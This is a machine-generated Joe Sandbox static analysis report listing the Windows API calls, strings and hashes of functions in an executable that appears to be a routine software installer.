• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID: UF
• API String ID: 2066263336-3088804789
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00453FD7,?,00000000,00454017), ref: 00453F1D
Strings
• PendingFileRenameOperations, xrefs: 00453EBC
• WININIT.INI, xrefs: 00453F4C
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EA0
• PendingFileRenameOperations2, xrefs: 00453EEC
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
  • Part of subcall function 00463570: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00463608
  • Part of subcall function 00463570: DestroyCursor.USER32(00000000), ref: 0046361E
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Icon$ExtractFileInfo$CursorDestroyDraw
• String ID: c:\directory
• API String ID: 2926980410-3984940477
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004535F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,004536B8), ref: 0045365C
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: P@Rn$SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-2752268360
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491717), ref: 0042DCA3
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetActiveWindow.USER32(?,?,00000000,0047D751,?,?,00000001,?), ref: 0047D54D
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047D5C2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ActiveChangeNotifyWindow
• String ID: $Need to restart Windows? %s
• API String ID: 1160245247-4200181552
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
• GetLastError.KERNEL32(00000000,0046B5BD,?,?,00000001,004950AC), ref: 0046B49A
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046B514
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046B539
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ChangeNotify$ErrorFullLastNamePath
• String ID: Creating directory: %s
• API String ID: 2451617938-483064649
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,004541E3,?,00000001,00000000), ref: 004541D6
                                                                            Strings
                                                                            • PendingFileRenameOperations, xrefs: 004541A8
                                                                            • PendingFileRenameOperations2, xrefs: 004541B7
                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454184
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                            • API String ID: 47109696-2115312317
                                                                            • Opcode ID: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                            • Instruction ID: 8e02acf7dda17f65ef86d3b585dbeec974d4a4341a7776fb0aa38c58d509200f
                                                                            • Opcode Fuzzy Hash: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                            • Instruction Fuzzy Hash: 2EF0F635208608BFD704D6E2DC06A1B77ECD7C5759FB14467F9009F582DE78AE94921C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 004212D1
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                            • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu
                                                                            • String ID:
                                                                            • API String ID: 3711407533-0
                                                                            • Opcode ID: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                            • Instruction ID: 48f3a64e559805c9a8555d4ddd453999d2efe8395b615d28906c4a6af38eb170
                                                                            • Opcode Fuzzy Hash: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                            • Instruction Fuzzy Hash: 0141BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7CCC4582AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                            • String ID:
                                                                            • API String ID: 601730667-0
                                                                            • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                            • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                            • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                            • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                            • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                            • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnumLongWindows
                                                                            • String ID:
                                                                            • API String ID: 4191631535-0
                                                                            • Opcode ID: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                            • Instruction ID: 5fb1b4c26b7281e556a96b269d9e57b3a313a4882f561b886cf0e087050bba11
                                                                            • Opcode Fuzzy Hash: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                            • Instruction Fuzzy Hash: 45115A70700610ABDB10EF68DC85F5A77E8EB48725F11026AF9A4AB2E2C37CDC41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                            • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A14620A480A570EnumFonts
                                                                            • String ID:
                                                                            • API String ID: 2780753366-0
                                                                            • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                            • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                            • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                            • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                            • String ID:
                                                                            • API String ID: 4071923889-0
                                                                            • Opcode ID: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                            • Instruction ID: 9fccd2aefca3528e48b7c7924445ec13d0cbcd302fba8438f8af89f39fd4f237
                                                                            • Opcode Fuzzy Hash: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                            • Instruction Fuzzy Hash: 6001F9F0E006087EEB209BA58C02F6BBA9CDB0D7A1F504567B904D32C2D6785E008668
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                            • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocHandleWire
                                                                            • String ID:
                                                                            • API String ID: 2210401237-0
                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045A7BD
                                                                            Strings
                                                                            • NumRecs range exceeded, xrefs: 0045A6BA
                                                                            • EndOffset range exceeded, xrefs: 0045A6F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$BuffersFlush
                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                            • API String ID: 3593489403-659731555
                                                                            • Opcode ID: f5353da7195564ca37abaa3109455b6c04b0bacf0af18a609462ca18570fcbf9
                                                                            • Instruction ID: 2b961db3f5bdd9156690fc13548013475d80f4f35adf24b78551c01bb99683a1
                                                                            • Opcode Fuzzy Hash: f5353da7195564ca37abaa3109455b6c04b0bacf0af18a609462ca18570fcbf9
                                                                            • Instruction Fuzzy Hash: 6B61B634A002948FDB24DF25C880BDAB7B5EF49305F0085EAED889B352D674AEC9CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                              • Part of subcall function 00409AE8: 6F561CD0.COMCTL32(00492949), ref: 00409AE8
                                                                              • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
                                                                              • Part of subcall function 00418FB0: GetVersion.KERNEL32(0049295D), ref: 00418FB0
                                                                              • Part of subcall function 0044EFD8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                              • Part of subcall function 0044EFD8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                              • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                              • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                              • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                              • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                              • Part of subcall function 00460AF4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                              • Part of subcall function 00460AF4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                              • Part of subcall function 00468898: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
                                                                              • Part of subcall function 00473B70: GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                              • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                              • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                              • Part of subcall function 0048FAC4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0048FADD
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004929E1), ref: 004929B3
                                                                              • Part of subcall function 0049273C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                              • Part of subcall function 0049273C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                              • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • ShowWindow.USER32(?,00000005,00000000,004929E1), ref: 00492A24
                                                                              • Part of subcall function 0047CB54: SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule$Window$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModeRegisterSendShowTextThreadVersion
                                                                            • String ID: Setup
                                                                            • API String ID: 1914857289-3839654196
                                                                            • Opcode ID: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                            • Instruction ID: eded0d4357af90f477a459f2b01769dd77d742874e450745c10b4ef5d55a2914
                                                                            • Opcode Fuzzy Hash: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                            • Instruction Fuzzy Hash: C33115722046006FD601BBB7ED5395D3B98EBC9719B62457FF40492A93CE7C5C418A3E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523EE
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                            • Instruction ID: f2a91aa9b7c92abf08b1cf9804f586f67492acd5f2b8aa702b6c2495f1d600d0
                                                                            • Opcode Fuzzy Hash: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                            • Instruction Fuzzy Hash: EF216574A002089BDB01EFA1C9429DFB7B9EF49305F50447BEC01B7342DA7C9E048AA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C0
• GetLastError.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C8
Strings
Similarity
• API ID: CreateErrorLastProcess
• String ID: 0aE
• API String ID: 2919029540-2709181307
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047741E,00000000,00477434,?,?,?,?,00000000), ref: 004771FA
Strings
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A65
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A7C
  • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
Strings
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: CreateFile
• API String ID: 2528220319-823142352
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
  • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
Strings
Similarity
• API ID: AddressErrorLibraryLoadModeProc
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2492108670-2683653824
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000,00000000,0047C340), ref: 0047C2D8
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C2E9
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C301
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• 74D31520.VERSION(00000000,?,?,?,004917BA), ref: 00450EB4
• 74D31500.VERSION(00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EE1
• 74D31540.VERSION(?,00450F58,?,?,00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EFB
Similarity
• API ID: D31500D31520D31540
• String ID:
• API String ID: 1003763464-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• 73A0A570.USER32(00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044AC95
• SelectObject.GDI32(?,00000000), ref: 0044ACB8
• 73A0A480.USER32(00000000,?,0044ACF8,00000000,0044ACF1,?,00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044ACEB
Similarity
• API ID: A480A570ObjectSelect
• String ID:
• API String ID: 1230475511-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9E0,?,0047CB6F,?,?), ref: 0044A9B2
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A9C5
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9F9
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID:
• API String ID: 65125430-0
Uniqueness

